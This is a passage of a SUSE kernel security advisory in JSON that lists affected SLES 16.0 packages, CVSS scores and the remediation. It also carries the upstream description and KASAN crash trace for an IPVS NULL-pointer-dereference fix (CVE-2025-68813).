"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68811",
"url": "https://www.suse.com/security/cve/CVE-2025-68811"
},
{
"category": "external",
"summary": "SUSE Bug 1256677 for CVE-2025-68811",
"url": "https://bugzilla.suse.com/1256677"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68811"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
